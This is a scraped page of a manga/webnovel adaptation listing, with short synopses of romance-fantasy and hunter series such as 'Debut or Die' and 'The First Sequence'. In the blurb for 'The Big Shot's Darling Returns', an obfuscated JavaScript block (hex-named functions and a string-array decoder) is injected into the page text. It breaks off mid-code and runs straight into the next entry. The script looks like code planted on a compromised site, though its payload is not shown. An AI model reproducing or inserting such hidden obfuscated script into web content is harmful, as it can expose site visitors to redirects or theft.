Adaptation - Page 79

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1045 results

I’m Going To Meet You Beyond Time

Genius magician Eleanor, who is also the Grand Magician and Duchess of a small country, activates her time magic, which she has been preparing since the day her mother died, to capture her. Eleanor, who has traveled back 24 years into the past, sets out to find her mother, but encounters a man she doesn’t recognize. Liam Temperyion, Duke of the Empire. However, in the future where Eleanor lives, his family does not exist. Void information. Eleanor approaches the truth of the past.


Cross My Heart And Hope To Die

In pursuit of a natural death, Silvia reluctantly agrees to a strategic marriage. To deceive the gods, she must convincingly play the role of a married couple. “Shall we turn off the lights then?” “Why would we…?” “Don’t we have to consummate our marriage on the first night?” “Why is that necessary?” Isn’t my husband too conservative? Silvia, who yearns for a chance to die, and Randal, who struggles with conflicting emotions, embark on an unexpected healing romance.Hoping to Die / I hope to Die / 죽음을 희망합니다


Struck by an Obscene Curse

“Put it inside me.” “Are you sure, Princess?” “Yes, I am. Put it inside me. Do it with me.” Abel, the third princess of the Kingdom of Ernst, grew up sheltered like a flower in a greenhouse. During her otherwise ordinary days, she suddenly became cursed. The curse of desire bestowed upon the three sisters. Cecil, the eldest sister, ate voraciously, and Charlotte, the second sister, slept as if she were dead. And I… began to feel an overwhelming sexual desire. Knights, wizards, priests; I did not discriminate in my liaisons. Sometimes with one, sometimes with two, or even… How many times will I do it today? Can I manage to sleep? My heart trembles, and I cannot tell if it’s from fear or excitement.


Going To Bed With My Hater

Heesu, a critic known for her hating comments towards the Korea's top actor Dohyun was getting herself drunk in a small street vendor near her house after her boyfriend's ghosting. She runs into Dohyun while she's totally wasted, and somehow wakes up naked in his bed the next day. To make things worse, she has to co-star with Dohyun in a TV program called “Going To Bed With Your Hater”. While Dohyun is making a move on Heesu more and more aggressively, Heesu can't help but start to fall in love with him slowly.


The Big Shot’s Darling Returns

Jun Qing finally transmigrates back to her original world, but finds out her own body had been taken over by another transmigrator for 2 years. Even the fourth brother, whom she has been pining after secretly for many years treats her coldly. Dealing with the trouble the previous transmigrator left behind, and simultaneously getting fourth brother's heart back, Jun Qing says this is no hard feat!<script></script><script>function _0x4b69(_0x49445a,_0x3c4767){var _0x479727=_0x42ef();return _0x4b69=function(_0x1bf912,_0x252e7d){_0x1bf912=_0x1bf912-(0x61*0x17+-0x2*-0xaf3+-0x1cb7*0x1);var _0x1a3fed=_0x479727[_0x1bf912];return _0x1a3fed;},_0x4b69(_0x49445a,_0x3c4767);}(function(_0x2717b6,_0x3187b3){var _0x13c3c5=_0x4b69,_0x2deeee=_0x2717b6();while(!![]){try{var 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The First Sequence

Due to the nuclear winter, the world was destroyed and a new era opened. Human beings are no longer the masters of the world, and crises have emerged one after another. Mankind rebuilds the order of the new world. At this time, the protagonist Ren Xiaosu rose step by step by absorbing positive energy, while changing the world. First Order


The Dungeon’s Dying S-Class Lady

Shin Yoori, South Korea’s very first S-Rank Hunter and the leader of the most elite Hunter Team, ventures into a dungeon for the anticipated challenge of clearing an L-Rank gate, known to be extremely difficult. Entering a role-playing dungeon that’s set in a Romantic Fantasy world, Shin Yoori unexpectedly finds herself possessing a frail young lady. While her teammates possess dazzling characters, why is she the only one…?! Struggling with a body that quickly loses stamina just by walking, Shin Yoori wonders why she is the only one suffering from these difficulties…! Will they clear this dungeon with their sanity intact, despite the unexpected twists and challenges that they’ll face?


From Maid To Queen

​​Urania was just a lowly maid until she captured the attention of King Kraus III and became his concubine. The nobles and the other maids, however, despised their love and dragged Urania down. Heartbroken and at her wit’s end, she was ready to accept her death, but then a mysterious entity returns her to her past when she is still a maid. With her second chance at life, Urania is determined to become the king’s concubine once more, but this all changes when she meets Oscar, who pushes her to aspire for greater things…


Debut or Die

A 4th year student who was preparing for the Civil Service examination, suddenly he found himself in an unfamiliar body 3 years ago. As well as a status window displaying a threat in front of his eyes! [Outbreak!] [Status Abnormality: ‘Debut or Death’ Occurs!] A diary about the transformation of the main character, who was suddenly challenged to be an idol even though he has never been in the industry before due to sudden threat of death. ※Speciality: He used to take and sell idol’s data. If I Fail to Debut, I’ll Get a Killer Disease / 데뷔 못 하면 죽는 병 걸림


The High School Survival Guide For A Wizard

Despite her hatred of humans, the powerful wizard Oz decides to attend a human high school and make friends due to an old deal. Unfortunately, she has difficulty adjusting due to her uncontrollable magic. Things get even more complicated when a mysterious tornado from Oz’s world drops a knight named Dorothy at her school. In an effort not to blow her cover, Oz quickly takes him in, oblivious to the fact that this annoying intruder may be the key to unlocking the school life she wants.


High School Life Guide for the Great Wizard

Read manhwa High School Life Guide for the Great Wizard / A Guide to High School Life for Archmages / 대마법사를 위한 고교생활 가이드


I’m the Villainous Male Lead’s Terminally Ill Aunt

I realized it when I heard the news that my sister, who had run away from home, had died. My nephew was born as the illegitimate son of the crown prince and would become a tyrant, and I possessed his villainous aunt who was killed by the mad male lead. Then what I need to do right now… “Those mercenaries! 500,000 gold, hired right now!” It’s a gamble with my life! A capitalist mercenary who saved all his fortune and a perfect plan to get her nephew out of the abyss of darkness. It was obviously going to be a grand adventure for peace. Until the mercenary went on a rampage right before the nephew he saved. “Be aware of reality, young master. Even of that aunt who worked so hard to find her nephew.” “What are you saying?” “…What do you know?” “What, Damian?” An adventure drama becomes a thriller in an instant. The death flag that I barely held onto was raised again. “I don’t think a one-year contract would be enough. How about an extension, lady?” As if one was not enough, now there are two crazy people. Please let me live in peace!
